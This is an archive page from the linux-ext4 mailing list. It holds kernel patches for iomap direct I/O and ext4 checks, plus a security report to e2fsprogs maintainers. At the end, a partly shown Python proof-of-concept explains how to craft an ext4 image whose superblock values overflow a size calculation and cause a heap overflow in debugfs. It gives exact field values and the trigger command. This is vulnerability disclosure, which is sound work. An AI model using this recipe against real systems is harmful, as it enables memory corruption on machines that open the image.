* Re: security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Andreas Dilger @ 2026-06-08 9:49 UTC (permalink / raw)
To: Feng Xue; +Cc: tytso@mit.edu, linux-ext4@vger.kernel.org
In-Reply-To: <SY0P300MB0070F750CCF6F2C3A2A91FDE901F2@SY0P300MB0070.AUSP300.PROD.OUTLOOK.COM>
[-- Attachment #1: Type: text/plain, Size: 949 bytes --]
Hello Feng Xue,
thank you for your report. The inode blocks overflow looks legitimate, and trivial to fix. The reproducer is a bit strange, since it is a python script that generates a synthetic ext4 image directly rather than writing an e2fsck test case like "f_64kblock" using mke2fs to create the filesystem with mostly appropriate parameters, and debugfs to overwrite the values.
Then e2fsck can be run on the filesystem to fix the superblock s_blocks_per_group value.
A patch is attached with the trivial code fix for review and includes a test case.
The debugfs issue seems less important, since this requires the administrator to run the specific debugfs command on the specific file.
> On Jun 7, 2026, at 07:34, Feng Xue <feng.xue@outlook.com> wrote:
>
> Hi there,
>
> I'd like to report two potential security bugs for your review.
> detailed report and pocs attached.
>
> Best,
> Feng
Cheers, Andreas
[-- Attachment #2: 0001-libext2fs-fix-inode_blocks-overflow-in-ext2fs_open.patch --]
[-- Type: application/octet-stream, Size: 6294 bytes --]
^ permalink raw reply
* [PATCH v4] iomap: add simple read path for small direct I/O
From: Fengnan Chang @ 2026-06-08 7:31 UTC (permalink / raw)
To: brauner, djwong, hch, ojaswin, dgc, linux-xfs, linux-fsdevel,
linux-ext4, linux-kernel, lidiangang
Cc: Fengnan Chang
When running 4K random read workloads on high-performance Gen5 NVMe
SSDs, the software overhead in the iomap direct I/O path
(__iomap_dio_rw) becomes a significant bottleneck.
Using io_uring with poll mode for a 4K randread test on a raw block
device:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /dev/nvme10n1
Result: ~3.2M IOPS
Running the exact same workload on ext4 and XFS:
taskset -c 30 ./t/io_uring -p1 -d512 -b4096 -s32 -c32 -F1 -B1 -R1 -X1
-n1 -P1 /mnt/testfile
Result: ~1.92M IOPS
Profiling the ext4 workload reveals that a significant portion of CPU
time is spent on memory allocation and the iomap state machine
iteration:
5.33% [kernel] [k] __iomap_dio_rw
3.26% [kernel] [k] iomap_iter
2.37% [kernel] [k] iomap_dio_bio_iter
2.35% [kernel] [k] kfree
1.33% [kernel] [k] iomap_dio_complete
Introduce simple reads to reduce the overhead of iomap, simple read path
is triggered when the request satisfies:
- I/O size is <= inode blocksize (fits in a single block, no splits).
- No custom `iomap_dio_ops` (dops) registered by the filesystem.
After this optimization, the heavy generic functions disappear from the
profile, replaced by a single streamlined execution path:
4.83% [kernel] [k] iomap_dio_simple_read
With this patch, 4K random read IOPS on ext4 increases from 1.92M to
2.19M in the original single-core io_uring poll-mode workload.
Below are the test results using fio:
fs workload qd simple=0 simple=1 gain
ext4 libaio 1 18,768 18,796 +0.15%
ext4 libaio 64 462,459 479,435 +3.67%
ext4 libaio 128 462,427 478,411 +3.46%
ext4 libaio 256 461,579 477,561 +3.46%
ext4 io_uring 1 18,898 18,914 +0.08%
ext4 io_uring 64 564,405 590,145 +4.56%
ext4 io_uring 128 563,322 592,365 +5.16%
ext4 io_uring 256 562,281 590,593 +5.04%
ext4 io_uring_poll 1 19,292 19,271 -0.11%
ext4 io_uring_poll 64 994,612 1,006,334 +1.18%
ext4 io_uring_poll 128 1,421,945 1,518,535 +6.79%
ext4 io_uring_poll 256 1,576,507 1,772,901 +12.46%
xfs libaio 1 18,778 18,781 +0.01%
xfs libaio 64 459,617 476,411 +3.65%
xfs libaio 128 461,642 477,571 +3.45%
xfs libaio 256 459,828 475,224 +3.35%
xfs io_uring 1 18,898 18,923 +0.13%
xfs io_uring 64 557,195 583,320 +4.69%
xfs io_uring 128 560,109 585,549 +4.54%
xfs io_uring 256 559,117 581,846 +4.07%
xfs io_uring_poll 1 19,257 19,301 +0.23%
xfs io_uring_poll 64 983,827 998,497 +1.49%
xfs io_uring_poll 128 1,389,644 1,489,604 +7.19%
xfs io_uring_poll 256 1,523,554 1,702,827 +11.77%
v4:
fix fserror report and update test data based on v7.1-rc3.
v3:
Test data updated based on v7.1-rc3.
Signed-off-by: Fengnan Chang <changfengnan@bytedance.com>
---
fs/iomap/direct-io.c | 390 +++++++++++++++++++++++++++++++++++++++++--
1 file changed, 376 insertions(+), 14 deletions(-)
diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
index b36ee619cdcdd..3cb179752612e 100644
--- a/fs/iomap/direct-io.c
+++ b/fs/iomap/direct-io.c
@@ -10,6 +10,9 @@
#include <linux/iomap.h>
#include <linux/task_io_accounting_ops.h>
#include <linux/fserror.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/init.h>
#include "internal.h"
#include "trace.h"
@@ -88,9 +91,9 @@ static inline enum fserror_type iomap_dio_err_type(const struct iomap_dio *dio)
return FSERR_DIRECTIO_READ;
}
-static inline bool should_report_dio_fserror(const struct iomap_dio *dio)
+static inline bool should_report_dio_fserror(int error)
{
- switch (dio->error) {
+ switch (error) {
case 0:
case -EAGAIN:
case -ENOTBLK:
@@ -110,7 +113,7 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
if (dops && dops->end_io)
ret = dops->end_io(iocb, dio->size, ret, dio->flags);
- if (should_report_dio_fserror(dio))
+ if (should_report_dio_fserror(dio->error))
fserror_report_io(file_inode(iocb->ki_filp),
iomap_dio_err_type(dio), offset, dio->size,
dio->error, GFP_NOFS);
@@ -237,23 +240,29 @@ static void iomap_dio_done(struct iomap_dio *dio)
iomap_dio_complete_work(&dio->aio.work);
}
-static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+static inline void iomap_dio_bio_release_pages(struct bio *bio,
+ unsigned int dio_flags, bool error)
{
- struct iomap_dio *dio = bio->bi_private;
-
if (bio_integrity(bio))
fs_bio_integrity_free(bio);
- if (dio->flags & IOMAP_DIO_BOUNCE) {
- bio_iov_iter_unbounce(bio, !!dio->error,
- dio->flags & IOMAP_DIO_USER_BACKED);
+ if (dio_flags & IOMAP_DIO_BOUNCE) {
+ bio_iov_iter_unbounce(bio, error,
+ dio_flags & IOMAP_DIO_USER_BACKED);
bio_put(bio);
- } else if (dio->flags & IOMAP_DIO_USER_BACKED) {
+ } else if (dio_flags & IOMAP_DIO_USER_BACKED) {
bio_check_pages_dirty(bio);
} else {
bio_release_pages(bio, false);
bio_put(bio);
}
+}
+
+static void __iomap_dio_bio_end_io(struct bio *bio, bool inline_completion)
+{
+ struct iomap_dio *dio = bio->bi_private;
+
+ iomap_dio_bio_release_pages(bio, dio->flags, !!dio->error);
/* Do not touch bio below, we just gave up our reference. */
@@ -398,6 +407,14 @@ static ssize_t iomap_dio_bio_iter_one(struct iomap_iter *iter,
return ret;
}
+static inline unsigned int iomap_dio_alignment(struct inode *inode,
+ struct block_device *bdev, unsigned int dio_flags)
+{
+ if (dio_flags & IOMAP_DIO_FSBLOCK_ALIGNED)
+ return i_blocksize(inode);
+ return bdev_logical_block_size(bdev);
+}
+
static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
{
const struct iomap *iomap = &iter->iomap;
@@ -416,10 +433,7 @@ static int iomap_dio_bio_iter(struct iomap_iter *iter, struct iomap_dio *dio)
* File systems that write out of place and always allocate new blocks
* need each bio to be block aligned as that's the unit of allocation.
*/
- if (dio->flags & IOMAP_DIO_FSBLOCK_ALIGNED)
- alignment = fs_block_size;
- else
- alignment = bdev_logical_block_size(iomap->bdev);
+ alignment = iomap_dio_alignment(inode, iomap->bdev, dio->flags);
if ((pos | length) & (alignment - 1))
return -EINVAL;
@@ -891,12 +905,352 @@ __iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
}
EXPORT_SYMBOL_GPL(__iomap_dio_rw);
+struct iomap_dio_simple_read {
+ struct kiocb *iocb;
+ size_t size;
+ unsigned int dio_flags;
+ atomic_t state;
+ union {
+ struct task_struct *waiter;
+ struct work_struct work;
+ };
+ /*
+ * Align @bio to a cacheline boundary so that, combined with the
+ * front_pad passed to bioset_init(), the bio sits at the start of
+ * a cacheline in memory returned by the (HWCACHE-aligned) bio
+ * slab. This keeps the hot fields block layer touches on submit
+ * and completion (bi_iter, bi_status, ...) within a single line.
+ */
+ struct bio bio ____cacheline_aligned_in_smp;
+};
+
+static struct bio_set iomap_dio_simple_read_pool;
+
+/*
+ * In the async simple read path, we need to prevent bio_endio() from
+ * triggering iocb->ki_complete() before the submitter has returned
+ * -EIOCBQUEUED. Otherwise, the caller might free the iocb concurrently.
+ *
+ * We use a three-state rendezvous to synchronize the submitter and end_io:
+ *
+ * IOMAP_DIO_SIMPLE_SUBMITTING: Initial state set before submitting the bio.
+ *
+ * IOMAP_DIO_SIMPLE_QUEUED: The submitter has safely queued the IO and will
+ * return -EIOCBQUEUED. If end_io sees this state, it takes over and calls
+ * ki_complete().
+ *
+ * IOMAP_DIO_SIMPLE_DONE: end_io fired before the submitter finished the
+ * submit path. end_io sets this state and does nothing else. The submitter
+ * will see this state and handle the completion synchronously (bypassing
+ * ki_complete() and returning the actual result).
+ */
+enum {
+ IOMAP_DIO_SIMPLE_SUBMITTING = 0,
+ IOMAP_DIO_SIMPLE_QUEUED,
+ IOMAP_DIO_SIMPLE_DONE,
+};
+
+static ssize_t iomap_dio_simple_read_finish(struct kiocb *iocb,
+ struct bio *bio, ssize_t ret)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ struct iomap_dio_simple_read *sr = bio->bi_private;
+
+ if (likely(!ret)) {
+ ret = sr->size;
+ iocb->ki_pos += ret;
+ } else if (should_report_dio_fserror(ret)) {
+ fserror_report_io(inode, FSERR_DIRECTIO_READ, iocb->ki_pos,
+ sr->size, ret, GFP_NOFS);
+ }
+
+ iomap_dio_bio_release_pages(bio, sr->dio_flags, ret < 0);
+
+ return ret;
+}
+
+static ssize_t iomap_dio_simple_read_complete(struct kiocb *iocb,
+ struct bio *bio)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ ssize_t ret;
+
+ WRITE_ONCE(iocb->private, NULL);
+
+ ret = iomap_dio_simple_read_finish(iocb, bio,
+ blk_status_to_errno(bio->bi_status));
+
+ inode_dio_end(inode);
+ trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0, ret > 0 ? ret : 0);
+ return ret;
+}
+
+static void iomap_dio_simple_read_complete_work(struct work_struct *work)
+{
+ struct iomap_dio_simple_read *sr =
+ container_of(work, struct iomap_dio_simple_read, work);
+ struct kiocb *iocb = sr->iocb;
+ ssize_t ret;
+
+ ret = iomap_dio_simple_read_complete(iocb, &sr->bio);
+ iocb->ki_complete(iocb, ret);
+}
+
+static void iomap_dio_simple_read_async_done(struct iomap_dio_simple_read *sr)
+{
+ struct kiocb *iocb = sr->iocb;
+
+ if (unlikely(sr->bio.bi_status)) {
+ struct inode *inode = file_inode(iocb->ki_filp);
+
+ INIT_WORK(&sr->work, iomap_dio_simple_read_complete_work);
+ queue_work(inode->i_sb->s_dio_done_wq, &sr->work);
+ return;
+ }
+
+ iomap_dio_simple_read_complete_work(&sr->work);
+}
+
+static void iomap_dio_simple_read_end_io(struct bio *bio)
+{
+ struct iomap_dio_simple_read *sr = bio->bi_private;
+
+ if (sr->waiter) {
+ struct task_struct *waiter = sr->waiter;
+
+ WRITE_ONCE(sr->waiter, NULL);
+ blk_wake_io_task(waiter);
+ return;
+ }
+
+ if (likely(atomic_read(&sr->state) == IOMAP_DIO_SIMPLE_QUEUED) ||
+ atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+ IOMAP_DIO_SIMPLE_DONE) == IOMAP_DIO_SIMPLE_QUEUED)
+ iomap_dio_simple_read_async_done(sr);
+}
+
+static inline bool iomap_dio_simple_read_supported(struct kiocb *iocb,
+ struct iov_iter *iter, unsigned int dio_flags)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ size_t count = iov_iter_count(iter);
+
+ if (iov_iter_rw(iter) != READ)
+ return false;
+ if (!count)
+ return false;
+ /*
+ * Simple read is an optimization for small IO. Filter out large IO
+ * early as it's the most common case to fail for typical direct IO
+ * workloads.
+ */
+ if (count > inode->i_sb->s_blocksize)
+ return false;
+ if (dio_flags & (IOMAP_DIO_FORCE_WAIT | IOMAP_DIO_PARTIAL))
+ return false;
+ if (iocb->ki_pos + count > i_size_read(inode))
+ return false;
+
+ return true;
+}
+
+static ssize_t iomap_dio_simple_read(struct kiocb *iocb,
+ struct iov_iter *iter, const struct iomap_ops *ops,
+ void *private, unsigned int dio_flags)
+{
+ struct inode *inode = file_inode(iocb->ki_filp);
+ size_t count = iov_iter_count(iter);
+ int nr_pages;
+ struct iomap_dio_simple_read *sr;
+ unsigned int alignment;
+ struct iomap_iter iomi = {
+ .inode = inode,
+ .pos = iocb->ki_pos,
+ .len = count,
+ .flags = IOMAP_DIRECT,
+ .private = private,
+ };
+ struct bio *bio;
+ bool wait_for_completion = is_sync_kiocb(iocb);
+ ssize_t ret;
+
+ if (dio_flags & IOMAP_DIO_BOUNCE)
+ nr_pages = bio_iov_bounce_nr_vecs(iter, REQ_OP_READ);
+ else
+ nr_pages = bio_iov_vecs_to_alloc(iter, BIO_MAX_VECS);
+
+ if (iocb->ki_flags & IOCB_NOWAIT)
+ iomi.flags |= IOMAP_NOWAIT;
+
+ ret = kiocb_write_and_wait(iocb, count);
+ if (ret)
+ return ret;
+
+ inode_dio_begin(inode);
+
+ ret = ops->iomap_begin(inode, iomi.pos, count, iomi.flags,
+ &iomi.iomap, &iomi.srcmap);
+ if (ret) {
+ inode_dio_end(inode);
+ return ret;
+ }
+
+ if (iomi.iomap.type != IOMAP_MAPPED ||
+ iomi.iomap.offset > iomi.pos ||
+ iomi.iomap.offset + iomi.iomap.length < iomi.pos + count ||
+ (iomi.iomap.flags & IOMAP_F_INTEGRITY)) {
+ ret = -ENOTBLK;
+ goto out_iomap_end;
+ }
+
+ alignment = iomap_dio_alignment(inode, iomi.iomap.bdev, dio_flags);
+ if ((iomi.pos | count) & (alignment - 1)) {
+ ret = -EINVAL;
+ goto out_iomap_end;
+ }
+
+ if (!wait_for_completion && unlikely(!inode->i_sb->s_dio_done_wq)) {
+ ret = sb_init_dio_done_wq(inode->i_sb);
+ if (ret < 0)
+ goto out_iomap_end;
+ }
+
+ trace_iomap_dio_rw_begin(iocb, iter, dio_flags, 0);
+
+ if (user_backed_iter(iter))
+ dio_flags |= IOMAP_DIO_USER_BACKED;
+
+ bio = bio_alloc_bioset(iomi.iomap.bdev, nr_pages,
+ REQ_OP_READ | REQ_SYNC | REQ_IDLE,
+ GFP_KERNEL, &iomap_dio_simple_read_pool);
+ sr = container_of(bio, struct iomap_dio_simple_read, bio);
+
+ fscrypt_set_bio_crypt_ctx(bio, inode, iomi.pos, GFP_KERNEL);
+ sr->iocb = iocb;
+ sr->dio_flags = dio_flags;
+
+ bio->bi_iter.bi_sector = iomap_sector(&iomi.iomap, iomi.pos);
+ bio->bi_ioprio = iocb->ki_ioprio;
+ bio->bi_private = sr;
+ bio->bi_end_io = iomap_dio_simple_read_end_io;
+
+ if (dio_flags & IOMAP_DIO_BOUNCE)
+ ret = bio_iov_iter_bounce(bio, iter, count);
+ else
+ ret = bio_iov_iter_get_pages(bio, iter, alignment - 1);
+ if (unlikely(ret))
+ goto out_bio_put;
+
+ if (bio->bi_iter.bi_size != count) {
+ iov_iter_revert(iter, bio->bi_iter.bi_size);
+ ret = -ENOTBLK;
+ goto out_bio_release_pages;
+ }
+
+ sr->size = bio->bi_iter.bi_size;
+
+ if ((dio_flags & IOMAP_DIO_USER_BACKED) &&
+ !(dio_flags & IOMAP_DIO_BOUNCE))
+ bio_set_pages_dirty(bio);
+
+ if (iocb->ki_flags & IOCB_NOWAIT)
+ bio->bi_opf |= REQ_NOWAIT;
+ if ((iocb->ki_flags & IOCB_HIPRI) && !wait_for_completion) {
+ bio->bi_opf |= REQ_POLLED;
+ bio_set_polled(bio, iocb);
+ WRITE_ONCE(iocb->private, bio);
+ }
+
+ if (wait_for_completion) {
+ sr->waiter = current;
+ blk_crypto_submit_bio(bio);
+ } else {
+ atomic_set(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING);
+ sr->waiter = NULL;
+ blk_crypto_submit_bio(bio);
+ ret = -EIOCBQUEUED;
+ }
+
+ if (ops->iomap_end)
+ ops->iomap_end(inode, iomi.pos, count, count, iomi.flags,
+ &iomi.iomap);
+
+ if (wait_for_completion) {
+ for (;;) {
+ set_current_state(TASK_UNINTERRUPTIBLE);
+ if (!READ_ONCE(sr->waiter))
+ break;
+ blk_io_schedule();
+ }
+ __set_current_state(TASK_RUNNING);
+
+ ret = iomap_dio_simple_read_finish(iocb, bio,
+ blk_status_to_errno(bio->bi_status));
+ inode_dio_end(inode);
+ trace_iomap_dio_complete(iocb, ret < 0 ? ret : 0,
+ ret > 0 ? ret : 0);
+ } else if (atomic_cmpxchg(&sr->state, IOMAP_DIO_SIMPLE_SUBMITTING,
+ IOMAP_DIO_SIMPLE_QUEUED) ==
+ IOMAP_DIO_SIMPLE_DONE) {
+ ret = iomap_dio_simple_read_complete(iocb, bio);
+ } else {
+ trace_iomap_dio_rw_queued(inode, iomi.pos, count);
+ }
+
+ return ret;
+
+out_bio_release_pages:
+ if (dio_flags & IOMAP_DIO_BOUNCE)
+ bio_iov_iter_unbounce(bio, true, false);
+ else
+ bio_release_pages(bio, false);
+out_bio_put:
+ bio_put(bio);
+out_iomap_end:
+ if (ops->iomap_end)
+ ops->iomap_end(inode, iomi.pos, count, 0, iomi.flags,
+ &iomi.iomap);
+ inode_dio_end(inode);
+ return ret;
+}
+
ssize_t
iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
const struct iomap_ops *ops, const struct iomap_dio_ops *dops,
unsigned int dio_flags, void *private, size_t done_before)
{
struct iomap_dio *dio;
+ ssize_t ret;
+
+ /*
+ * Fast path for small, block-aligned reads that map to a single
+ * contiguous on-disk extent.
+ *
+ * @dops must be NULL: a non-NULL @dops means the caller wants its
+ * ->end_io / ->submit_io hooks invoked, and in particular wants its
+ * bios to be allocated from the filesystem-private @dops->bio_set
+ * (whose front_pad sizes a filesystem-private wrapper around the
+ * bio). The fast path instead allocates from the shared
+ * iomap_dio_simple_read_pool, whose front_pad matches
+ * struct iomap_dio_simple_read; the two wrappers are not
+ * interchangeable, so we must fall back to __iomap_dio_rw() in
+ * that case.
+ *
+ * @done_before must be zero: a non-zero caller-accumulated residual
+ * cannot be carried through a single-bio inline completion.
+ *
+ * -ENOTBLK is the private sentinel returned by iomap_dio_simple_read()
+ * when it decides the request does not fit the fast path.
+ * In that case we proceed to the generic __iomap_dio_rw() slow
+ * path. Any other errno is a real result and is propagated as-is,
+ * in particular -EAGAIN for IOCB_NOWAIT must reach the caller.
+ */
+ if (!dops && !done_before &&
+ iomap_dio_simple_read_supported(iocb, iter, dio_flags)) {
+ ret = iomap_dio_simple_read(iocb, iter, ops, private, dio_flags);
+ if (ret != -ENOTBLK)
+ return ret;
+ }
dio = __iomap_dio_rw(iocb, iter, ops, dops, dio_flags, private,
done_before);
@@ -905,3 +1259,11 @@ iomap_dio_rw(struct kiocb *iocb, struct iov_iter *iter,
return iomap_dio_complete(dio);
}
EXPORT_SYMBOL_GPL(iomap_dio_rw);
+
+static int __init iomap_dio_init(void)
+{
+ return bioset_init(&iomap_dio_simple_read_pool, 4,
+ offsetof(struct iomap_dio_simple_read, bio),
+ BIOSET_NEED_BVECS | BIOSET_PERCPU_CACHE);
+}
+fs_initcall(iomap_dio_init);
--
2.39.5 (Apple Git-154)
^ permalink raw reply related
* [PATCH] ext4: fix kernel BUG in ext4_write_inline_data_end
From: Aditya Prakash Srivastava @ 2026-06-08 6:52 UTC (permalink / raw)
To: Theodore Ts'o, Andreas Dilger
Cc: Jan Kara, Baokun Li, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
linux-ext4, linux-kernel, Aditya Prakash Srivastava,
syzbot+0c89d865531d053abb2d
When the data=journal mount option is used, the ext4_journalled_write_end()
function incorrectly calls ext4_write_inline_data_end() without checking
if the EXT4_STATE_MAY_INLINE_DATA flag is still set on the inode.
If a previous attempt to convert the inline data to an extent failed (e.g.
due to ENOSPC), the EXT4_STATE_MAY_INLINE_DATA flag is cleared, but
the EXT4_INODE_INLINE_DATA flag remains set. In this scenario, the next
call to ext4_write_begin() will not prepare the inline data xattr for
writing, but ext4_journalled_write_end() will incorrectly attempt to write
to it, triggering a BUG_ON(pos + len > EXT4_I(inode)->i_inline_size) in
ext4_write_inline_data() since i_inline_size was not expanded.
Fix this by ensuring that ext4_journalled_write_end() only calls
ext4_write_inline_data_end() if the EXT4_STATE_MAY_INLINE_DATA flag is
set, mirroring the behavior of ext4_write_end() and ext4_da_write_end().
Reported-by: syzbot+0c89d865531d053abb2d@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=0c89d865531d053abb2d
Fixes: 3fdcfb668fd7 ("ext4: add journalled write support for inline data")
Signed-off-by: Aditya Prakash Srivastava <aditya.ansh182@gmail.com>
---
fs/ext4/inode.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index c2c2d6ac7f3d..4fce9ec176f8 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -1560,7 +1560,8 @@ static int ext4_journalled_write_end(const struct kiocb *iocb,
BUG_ON(!ext4_handle_valid(handle));
- if (ext4_has_inline_data(inode))
+ if (ext4_has_inline_data(inode) &&
+ ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
return ext4_write_inline_data_end(inode, pos, len, copied,
folio);
--
2.47.3
^ permalink raw reply related
* [PATCH] ext4: reject mount if clusters/inodes per group are not 8-aligned
From: Baokun Li @ 2026-06-08 6:11 UTC (permalink / raw)
To: linux-ext4
Cc: tytso, adilger.kernel, jack, yi.zhang, ojaswin, ritesh.list,
Sashiko
The block and inode bitmap checksums are computed over a whole number of
bytes: ext4_inode_bitmap_csum_*() use EXT4_INODES_PER_GROUP(sb) >> 3 and
ext4_block_bitmap_csum_*() use EXT4_CLUSTERS_PER_GROUP(sb) / 8 as the
length passed to ext4_chksum().
If s_inodes_per_group or s_clusters_per_group is not a multiple of 8, the
trailing fractional bits are excluded from the checksum. Those bits are
then unprotected, and any incremental csum update path that assumes a
byte-aligned bitmap can compute a checksum inconsistent with the full
recalculation, corrupting the on-disk bitmap checksum.
Reject such filesystems at mount time by adding the missing " & 7"
alignment checks alongside the existing range validation.
Suggested-by: Theodore Ts'o <tytso@mit.edu>
Link: https://patch.msgid.link/h3n7jlfhyna64dn5o76qxcspnhxdddcs6crpxftmy7gnl7b3sx@jenszfpcsnit
Reported-by: Sashiko <sashiko-bot@kernel.org>
Closes: https://sashiko.dev/#/patchset/20260508121539.4174601-1-libaokun%40linux.alibaba.com?part=10
Signed-off-by: Baokun Li <libaokun@linux.alibaba.com>
---
fs/ext4/super.c | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 6a77db4d3124..3daf4cdcf07e 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -4472,8 +4472,9 @@ static int ext4_handle_clustersize(struct super_block *sb)
sbi->s_cluster_bits = 0;
}
sbi->s_clusters_per_group = le32_to_cpu(es->s_clusters_per_group);
- if (sbi->s_clusters_per_group > sb->s_blocksize * 8) {
- ext4_msg(sb, KERN_ERR, "#clusters per group too big: %lu",
+ if (sbi->s_clusters_per_group > sb->s_blocksize * 8 ||
+ sbi->s_clusters_per_group & 7) {
+ ext4_msg(sb, KERN_ERR, "invalid #clusters per group: %lu",
sbi->s_clusters_per_group);
return -EINVAL;
}
@@ -5304,7 +5305,8 @@ static int ext4_block_group_meta_init(struct super_block *sb, int silent)
return -EINVAL;
}
if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
- sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+ sbi->s_inodes_per_group > sb->s_blocksize * 8 ||
+ sbi->s_inodes_per_group & 7) {
ext4_msg(sb, KERN_ERR, "invalid inodes per group: %lu\n",
sbi->s_inodes_per_group);
return -EINVAL;
--
2.43.7
^ permalink raw reply related
* Re: [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Baokun Li @ 2026-06-08 2:25 UTC (permalink / raw)
To: Peng Wang
Cc: tytso, adilger.kernel, jack, ojaswin, ritesh.list, yi.zhang,
linux-ext4, inux-kernel
In-Reply-To: <20260607124935.6168-1-peng_wang@linux.alibaba.com>
On 2026/6/7 20:49, Peng Wang wrote:
> ext4_overwrite_io() decides whether a direct I/O write is an overwrite
> (all target blocks already allocated) so the write can proceed under a
> shared inode lock. It calls ext4_map_blocks() once and returns false
> if the mapped length is shorter than the requested length.
>
> ext4_map_blocks() maps at most one extent per call. When a write
> straddles two extents (e.g. a written extent and an adjacent unwritten
> extent created by fallocate), the single call returns only the first
> extent's length. ext4_overwrite_io() then mis-classifies the write as
> non-overwrite and forces the caller to cycle i_rwsem from shared to
> exclusive.
For the aligned case, the overwrite check can now be skipped entirely.
For non-aligned cases, you can optimistically hold the read lock and then
use the IOMAP_DIO_OVERWRITE_ONLY flag to upgrade to a write lock if needed.
^ permalink raw reply
* security bug reporting: e2fsprogs: Path Traversal and heap overflow
From: Feng Xue @ 2026-06-07 13:34 UTC (permalink / raw)
To: tytso@mit.edu, tytso@alum.mit.edu; +Cc: linux-ext4@vger.kernel.org
[-- Attachment #1.1: Type: text/plain, Size: 129 bytes --]
Hi there,
I'd like to report two potential security bugs for your review.
detailed report and pocs attached.
Best,
Feng
[-- Attachment #1.2: Type: text/html, Size: 1255 bytes --]
[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #2: craft_inode_overflow.py --]
[-- Type: text/x-python-script; name="craft_inode_overflow.py", Size: 13481 bytes --]
#!/usr/bin/env python3
"""
Craft an ext4 filesystem image that triggers an integer overflow in
the inode_blocks_per_group calculation in lib/ext2fs/openfs.c:359-362.
Bug:
fs->inode_blocks_per_group = ((EXT2_INODES_PER_GROUP(fs->super) *
EXT2_INODE_SIZE(fs->super) +
EXT2_BLOCK_SIZE(fs->super) - 1) /
EXT2_BLOCK_SIZE(fs->super));
The multiplication s_inodes_per_group * s_inode_size is done in 32-bit
unsigned arithmetic. If the product exceeds 2^32, it silently wraps,
producing a small inode_blocks_per_group. This causes all inode table
boundary checks to use wrong bounds, leading to OOB access.
Strategy:
- blocksize = 65536 (s_log_block_size = 6)
- inode_size = 16384 (power of 2, >= 128, <= blocksize)
- s_inodes_per_group = 0x40001 = 262145
- product = 262145 * 16384 = 0x100004000 -> truncated to 0x4000 = 16384
- inode_blocks_per_group = ceil(16384 / 65536) = 1 (should be 65537!)
- Only 1 block (64K) of inode table is considered valid per group, but
the fs claims 262145 inodes per group. Accessing any inode beyond the
first 4 (65536/16384=4) triggers OOB reads from the inode table.
- The inode bitmap check requires inodes_per_group/8 <= blocksize.
262145/8 = 32768 <= 65536. Passes.
Crash chain (inode scan path):
1. openfs.c:359: inode_blocks_per_group = 1 (should be 65537)
2. inode.c:293: blocks_left = 1 (only 1 block of inode table is read)
3. After 4 inodes, blocks_left = 0, but inodes_left = 262141
4. get_next_blocks returns num_blocks=0, bytes_left=0
5. inode.c:727-728: ptr += inode_size, bytes_left -= inode_size => -16384
6. inode.c:659: memcpy(temp_buffer, ptr, bytes_left) with bytes_left = -16384
=> cast to size_t = huge value => heap buffer overflow
Trigger: debugfs crafted.img -R "lsdel"
(any command that triggers ext2fs_open_inode_scan / get_next_inode)
"""
import struct
import sys
import os
import subprocess
# Superblock field offsets (from ext2_fs.h, all relative to superblock start)
OFF_INODES_COUNT = 0x00 # __u32
OFF_BLOCKS_COUNT = 0x04 # __u32
OFF_R_BLOCKS_COUNT = 0x08 # __u32
OFF_FREE_BLOCKS_COUNT = 0x0C # __u32
OFF_FREE_INODES_COUNT = 0x10 # __u32
OFF_FIRST_DATA_BLOCK = 0x14 # __u32
OFF_LOG_BLOCK_SIZE = 0x18 # __u32
OFF_LOG_CLUSTER_SIZE = 0x1C # __u32
OFF_BLOCKS_PER_GROUP = 0x20 # __u32
OFF_CLUSTERS_PER_GROUP = 0x24 # __u32
OFF_INODES_PER_GROUP = 0x28 # __u32
OFF_MAGIC = 0x38 # __u16
OFF_STATE = 0x3A # __u16
OFF_REV_LEVEL = 0x4C # __u32
OFF_FIRST_INO = 0x54 # __u32
OFF_INODE_SIZE = 0x58 # __u16
OFF_FEATURE_COMPAT = 0x5C # __u32
OFF_FEATURE_INCOMPAT = 0x60 # __u32
OFF_FEATURE_RO_COMPAT = 0x64 # __u32
OFF_DESC_SIZE = 0xFE # __u16
OFF_LOG_GROUPS_PER_FLEX = 0x174 # __u8
OFF_CHECKSUM_TYPE = 0x175 # __u8
OFF_BLOCKS_COUNT_HI = 0x150 # __u32
OFF_RESERVED_GDT_BLOCKS = 0xCE # __u16
# Feature flags
EXT2_FEATURE_INCOMPAT_FILETYPE = 0x0002
EXT3_FEATURE_INCOMPAT_EXTENTS = 0x0040
EXT4_FEATURE_INCOMPAT_64BIT = 0x0080
EXT4_FEATURE_INCOMPAT_FLEX_BG = 0x0200
EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER = 0x0001
EXT2_FEATURE_RO_COMPAT_LARGE_FILE = 0x0002
EXT4_FEATURE_RO_COMPAT_HUGE_FILE = 0x0008
EXT4_FEATURE_RO_COMPAT_GDT_CSUM = 0x0010
